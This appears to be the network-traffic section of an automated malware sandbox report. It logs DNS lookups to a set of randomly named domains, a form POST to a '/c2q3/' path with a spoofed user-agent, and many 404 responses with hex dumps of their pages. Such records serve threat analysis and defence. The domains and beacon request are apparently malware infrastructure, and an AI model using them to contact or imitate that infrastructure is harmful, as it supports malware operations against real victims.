                Source: global trafficDNS traffic detected: DNS query: www.7wkto5nk230724z.click
                Source: global trafficDNS traffic detected: DNS query: www.roopiedutech.online
                Source: global trafficDNS traffic detected: DNS query: www.abistra.store
                Source: global trafficDNS traffic detected: DNS query: www.suree.bet
                Source: global trafficDNS traffic detected: DNS query: www.bocadolobopetra.net
                Source: global trafficDNS traffic detected: DNS query: www.44kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.dbasky.net
                Source: global trafficDNS traffic detected: DNS query: www.zoptra.info
                Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
                Source: global trafficDNS traffic detected: DNS query: www.redex.fun
                Source: global trafficDNS traffic detected: DNS query: www.broork.sbs
                Source: global trafficDNS traffic detected: DNS query: www.deepfy.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cmdh1c.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beautyconcernsusa.net
                Source: unknownHTTP traffic detected: POST /c2q3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.7wkto5nk230724z.clickOrigin: http://www.7wkto5nk230724z.clickReferer: http://www.7wkto5nk230724z.click/c2q3/Content-Length: 202Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N8qld3sJZua8iW44eBacmyrVtdW1%2B69AqDPd3JsInJMXWWTtZldHzWToibszvZ6J9eRZ1pcNgMz48DxSPRvFXL9g76BjQjF9rgNLjF7U%2BPVvSjgs3ai%2BtfWHwig8%2FiEhjFF%2FAHC74KjjnEKT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25067df724761-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1875&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2woxl0lr2wvLQ83ITpXepXG2emJEoBc1c3dXr2ldsCtuSkOtQL3GS6CR%2FjMsWErS1qXNRCBo2G6vcdlTRyxt2W4TNF15y4P4%2BxmVfQkjEPv5anSWIcLbg%2F2iousDYnSNcd%2F6n8sng7D4wQ%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25077cacb4864-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1244&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YS9iQrxk9Uupw0402lvDL8x%2FW23y8bn4ehSLQm%2Bd%2FYCYlPS4Z3LZvL0M2gkiVUtHr1U9tgYBLvmN%2BqXN0CFIejZq9wMraSZ%2FLkqGdQ5h2dMLncpNEw6Fph2%2FnCHqVhGUGqKUxnYkmq5t8PQN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25087a9552cdc-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1400&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10912&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:12:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGqw%2BUFdXC2mDbOXxkbO%2FFXG5NQNNCzFDlz%2FPTyJQhqJFOen2iZf3EQWOr9%2Fo8cclF0QlbjY9%2BCuEooVoASZBHQcK0480xOckZuJpIrTJygysMNCqWLxaGoybH8xFLyeAcSpjvjkNcAL7HZK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dc25097b8262857-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:09 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:14 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:17 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:24 GMTContent-Type: text/htmlContent-Length: 146Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:26 GMTContent-Type: text/htmlContent-Length: 146Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:29 GMTContent-Type: text/htmlContent-Length: 146Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:13:31 GMTContent-Type: text/htmlContent-Length: 146Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:53 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:56 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 07:13:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:14:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: p529:0.000
77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 65 20 68 6f 73 74 69 6e 67 20 73 65 72 76 65 72 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 32 27 3a 20 27 44 6f 6d 61 69 6e 20 61 64 64 72 65 73 73 20 72 65 63 6f 72 64 20 70 6f 69 6e 74 73 20 74 6f 20 6f 75 72 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 69 73 20 73 69 74 65 20 69 73 20 6e 6f 74 20 73 65 72 76 65 64 2e 3c 62 72 3e 49 66 20 79 6f 75 20 68 61 76 65 20 72 65 63 65 6e 74 6c 79 20 61 64 64 65 64 20 61 20 73 69 74 65 20 74 6f 20 79 6f 75 72 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 20 2d 20 77 61 69 74 20 31 35 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 79 6f 75 72 20 73 69 74 65 20 77 69 6c 6c 20 73 74 61 72 74 20 77 6f 72 6b 69 6e 67 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 68 65 6c 70 5f 62 75 74 74 6f 6e 27 3a 20 27 48 6f 77 20 63 61 6e 20 49 20 66 69 78 20 74 68 69 73 3f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:19 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 
6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:22 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 
6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:24 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 
6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 02 Nov 2024 07:14:28 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 
6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 07:14:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
